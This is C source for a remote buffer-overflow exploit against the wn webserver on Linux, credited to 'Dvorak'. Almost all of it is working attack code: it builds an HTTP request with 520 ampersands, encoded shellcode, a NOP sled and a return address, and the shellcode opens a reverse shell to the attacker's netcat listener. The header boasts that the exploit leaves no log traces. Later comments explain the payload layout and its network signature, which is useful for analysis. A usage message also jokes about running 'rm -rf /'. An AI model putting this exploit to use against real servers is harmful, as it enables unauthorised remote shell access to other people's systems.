/*
 * USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL
 * RESPONSIBILITY FOR THE RESULTS
 */
/*
 * Bug discovered by:  Dvorak (dvorak@hit2000.org)
 * Exploit by:         Dvorak (dvorak@synnergy.net)
 * With help from:     Bounce (is that your official nick?)
 * Will work against:  wn webserver under Linux.
 * Exploit build at:   CCC (chaos communication camp, www.ccc.de)
 * Exploit first used: Hit2000 (www.hit2000.org)
 *
 * (against a dutch hosting provider to show it was possible)
 * I got a t-shirt from them; great marketing trick ;)
 *
 * Greets to: Hit2000 Crew (www.hit2000.org)
 *          : Synnergy Networks (www.synnergy.net)
 *          : emphyrio (wanneer ga je weer meer met security doen?)
 *          : shevek   (Building a remote AIX (4.3.2) ftpd exploit rocks!)
 *          : bivak    (niet chatten, leren!!)
 *          : #hit2000, #synnergy, #phreak.nl (irc.xs4all.nl)
 *
 *
 * New version of wn-server: hopf.math.nwu.edu 
 *
 * Check these sites out:
 *    www.hackernews.com
 *    www.securityfocus.com
 *    www.l0pht.com         
 */

/*
 * Remote exploit against the wn webserver 
 * (2.0.x, x < 9?)
 * (1.*)
 * (2.1.y, y < ?????)
 * The bug (ab)used is patched in the newest versions
 *
 * John(@matht.nwu.edu), thanks for the quick response
 */

/*
 * This exploit leaves NO traces in the logs
 * It will cast a shell with uid = uid of webserver (nobody typical)
 * to the ip-address specified with the -d option port 14640
 * so you'd better be listening there (use netcat (nc) it is absolutely
 * the number 1 networking tool, ok fragrouter and nmap are cool too)
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

/*
 * This is weird shellcode. Its normal shellcode which had every byte
 * split into 2 pieces which were or-ed with 0x80 to make sure the
 * whole range of bits was allowed by wn.
 *
 * The scrambled shellcode is highly inefficient, it can be cut down
 * to approximately 30% of its current size if you want to do it:
 * Do IT
 *
 * For more info and tools: dvorak@hit2000.org, dvorak@synnergy.net
 */

/*
 * Encoded payload that main() copies byte-for-byte into the request.
 * Per the author's note above, each original byte was split into two
 * halves OR'ed with 0x80, which is why almost every byte here lies in
 * 0x80..0x8f; the leading bytes on the first three lines are presumably
 * the in-place decoder (not verified here).  The eight 0x99 bytes on the
 * second-to-last line are placeholders: main() replaces every pair with
 * the two encoded nibbles of one byte of the -d address (see its copy
 * loop).  main() walks the array up to its NUL terminator, so no interior
 * byte may be zero.
 */
char shellcode[] = 
"\xeb\x2c\x5f\x89\xfe\x31\xc9\x89\xcb\x80\xc1\x01\x89\xcd\x89\xd9\x80\xc1\xff"
"\x90\x90\x8a\x34\x1e\x01\xee\x8a\x14\x1e\x01\xee\xc0\xe2\x04\x66\xc1\xfa\x04"
"\x88\x17\x01\xef\xe2\xe9\xeb\x05\xe8\xcf\xff\xff\xff\x83\x81\x8d\x8b\x88\x89"
"\x8d\x88\x80\x84\x86\x86\x88\x80\x8c\x83\x80\x81\x88\x89\x8d\x89\x88\x89"
"\x8c\x8a\x8e\x8b\x84\x81\x85\x8e\x88\x89\x84\x8e\x80\x88\x88\x80\x8c\x81"
"\x80\x81\x88\x89\x84\x8e\x80\x84\x88\x80\x8c\x81\x80\x84\x88\x89\x84\x8e"
"\x80\x8c\x88\x8d\x84\x8e\x80\x84\x8c\x8d\x88\x80\x88\x89\x80\x86\x83\x81"
"\x8c\x89\x88\x80\x8c\x81\x80\x82\x86\x86\x88\x89\x84\x8e\x80\x8c\x86\x86"
"\x88\x89\x84\x8e\x80\x8e\x88\x80\x8c\x81\x80\x8e\x86\x86\x88\x89\x84\x8e"
"\x80\x88\x86\x86\x8b\x89\x83\x89\x83\x80\x86\x86\x88\x89\x84\x8e\x80\x8e"
"\x88\x8d\x84\x86\x80\x8c\x88\x89\x84\x86\x80\x84\x83\x81\x8c\x89\x8b\x81"
"\x80\x83\x88\x89\x8c\x8a\x8e\x8b\x80\x82\x8e\x8b\x84\x89\x88\x89\x8c\x8b"
"\x88\x89\x8f\x81\x83\x81\x8c\x80\x80\x84\x86\x86\x8c\x8d\x88\x80\x83\x81"
"\x8c\x80\x88\x89\x8c\x81\x80\x84\x83\x8f\x88\x89\x8c\x82\x88\x8b\x81\x8e"
"\x8c\x8d\x88\x80\x88\x89\x8d\x80\x88\x80\x8c\x81\x80\x81\x8c\x8d\x88\x80"
"\x88\x89\x8d\x80\x88\x80\x8c\x81\x80\x81\x8c\x8d\x88\x80\x83\x81\x8c\x80"
"\x88\x89\x84\x86\x81\x80\x88\x88\x84\x86\x81\x8b\x88\x8d\x84\x86\x81\x84"
"\x88\x89\x84\x86\x80\x8c\x83\x81\x8c\x80\x80\x84\x80\x8b\x88\x8d\x85\x8e"
"\x81\x84\x88\x8d\x84\x8e\x80\x8c\x88\x8d\x85\x86\x81\x80\x8c\x8d\x88\x80"
"\x83\x81\x8c\x80\x84\x80\x88\x89\x8c\x83\x84\x83\x8c\x8d\x88\x80\x8e\x88"
"\x86\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x82\x8e\x86\x81\x86\x81\x86\x81\x86\x81"
"\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81\x86\x81"
"\x83\x89\x83\x80\x99\x99\x99\x99\x99\x99\x99\x99\x82\x8f\x86\x82\x86\x89"
"\x86\x8e\x82\x8f\x87\x83\x86\x88";

/*
 * Most of the hardcoded values here can be changed on the command line
 * but KNOW what you are doing or you will leave traces of your
 * activity in the log files
 */

/*
 * Writes the crafted request to stdout; the usage text expects it to be
 * piped into nc, this program opens no connection itself.  As emitted
 * below the request is, in order: the literal "GET /s=c?", num_amps '&'
 * bytes, the shellcode array with the -d address spliced into its 0x99
 * placeholders, num_nops 0x90 bytes, a 5-byte backward jmp, post_nops
 * 0x90 bytes, `align` filler bytes, the 4-byte return address and
 * "\r\n\r\n".  The request line carries no HTTP version token and is
 * almost entirely bytes >= 0x80, which is what a network-level sensor
 * would key on; the header comment claims the server itself logs nothing.
 *
 * Exit status: 2 on bad usage, 0 when -d is missing (after the rant),
 * otherwise falls off the end of a `void main`.
 */
void main(int argc, char *argv[]) 
{ 
    int num_amps = 520;           /* Number of &'s to use. If you read
                                   * the source of wn you'll know the
                                   * reason for this
                                   */
    int post_nops = 20;           /* 0x90 bytes emitted after the jmp (see below) */
    int num_nops = 400;           /* recomputed unconditionally below, so the
                                   * -n option has no effect on the output */
    int align = 0;                /* -a: count of 'q' filler bytes before ret */
    int ret = 0xbffe5dd4;         /* -R: return address; the default exceeds
                                   * INT_MAX, so its conversion to int is
                                   * implementation-defined */
    unsigned long my_addr = 0;    /* -d: listener address from inet_addr() */
    int i, shl_len;               /* shl_len: bytes emitted from shellcode[] */
    char opt;

    while ((opt = getopt(argc, argv, "n:a:R:d:h")) != EOF)
        switch (opt)
        {
            case 'd':
                /* presumably network byte order, so the low byte taken
                 * first below is the first octet -- confirm on target host */
                my_addr =  (inet_addr(optarg));
                break;
            case 'a':
                align = atoi(optarg);
                break;
            case 'R':
                ret = strtoul(optarg, NULL, 0);
                break;
            case 'n':
                num_nops = atoi(optarg);
                break;
            default:
                fprintf(stderr, "Use: wn_exploit -d <the ip  of the listening nc> | nc -v victim 80\n");
                fprintf(stderr, "on the listening host: nc -v -s <seem ip as above> -l -p 14640\n");
                fprintf(stderr, "Extended use:\n");
                fprintf(stderr, "\t -R 0xaddr\treturn address to use\n");
                fprintf(stderr, "\t if you want to tweak more:\n");
                fprintf(stderr, "\t read the source of wn_exploit of mail me.\n");
                fprintf(stderr, "\t dvorak@hit2000.org // dvorak@synnergy.net\n");
                exit(2);
        }

    /* Only a zero address (no -d, or 0.0.0.0) is rejected here. */
    if (!my_addr) {
        fprintf(stderr, "Hmm lets see what does system(\"rm -rf / & \") do to your machine?\n");
        fprintf(stderr, "\n\nShut The Fuck Up You Stupid Looser (STFUYSL)\n");
        exit(0);
    }

    fprintf(stderr, "wn remote exploit by dvorak(@hit2000.org // @synnergy.net)\n");
    
    /* Request line: fixed "/s=c?" path followed by num_amps '&' bytes.
     * This prefix plus the long run of '&' is the most stable part of
     * the request for signature matching. */
    printf("GET /s=c?");
    for (i = 0; i < num_amps; i++) printf("&");

    /* Copy shellcode[] to stdout up to its NUL terminator.  Each 0x99
     * byte in the array marks a placeholder pair: the high and low
     * nibble of the current low byte of my_addr are emitted as
     * 0x80|nibble (keeping every byte >= 0x80), the address is shifted
     * down one byte, and two array bytes are skipped.  shl_len ends up
     * equal to the number of bytes emitted in this loop. */
    shl_len = 0;
    while (shellcode[shl_len])
       if (shellcode[shl_len] == '\x99') {
           printf("%c", 0x80 + ((my_addr & 0xf0) >> 4));
           printf("%c", 0x80 + (my_addr & 0x0f));
           my_addr >>= 8;
           shl_len += 2;
       } else
           printf("%c", shellcode[shl_len++]);

    /*
     * Thats correct, we place the nops AFTER the shellcode 
     * and add a jmp instruction after the nops which makes a
     * relative jump back to the shellcode
     *
     * Want to know why? mail me.
     */
    /* The padding is sized so that 5*num_amps + shl_len + num_nops + 5
     * (jmp) + post_nops + 4 (ret) == 4104.  The factor 5 per '&' is
     * presumably how wn expands each '&' internally (see the comment
     * on num_amps) -- TODO confirm against wn's source.  Note this
     * discards any -n value and that `align` bytes are not counted. */
    num_nops = 4104 - 4 - (5*num_amps) - shl_len - 5 - post_nops; 
    for (i = 0; i < num_nops; i++) printf("%c", 0x90);

    /* 5-byte jmp rel32 (opcode 0xe9) whose displacement points back to
     * the first shellcode byte; emitted little-endian one byte at a
     * time through printf("%c"). */
    i = -(shl_len + num_nops + 5);
    printf("%c", 0xe9);
    printf("%c", (i & 0xff));
    printf("%c", (i >> 8) & 0xff);
    printf("%c", (i >> 16) &0xff);
    printf("%c", (i >> 24) & 0xff);

    /*
     * post_nops are required because else the jmp instruction added
     * above are overwritten by stack operations in the wn daemon
     */
    for (i = 0; i < post_nops; i++) printf("%c", 0x90);
    for (i = 0; i < align; i++) printf("q");
    /* Return address, little-endian, then the blank line ending the
     * request.  (ret >> 24) on a negative int is implementation-defined
     * but is masked to one byte either way. */
    printf("%c%c%c%c", ret & 0xff, (ret >> 8) &0xff, 
          (ret >> 16) & 0xff, (ret >> 24) & 0xff);
    printf("\r\n\r\n");
    fflush(stdout);
}
/*                    www.hack.co.za           [20 July]*/
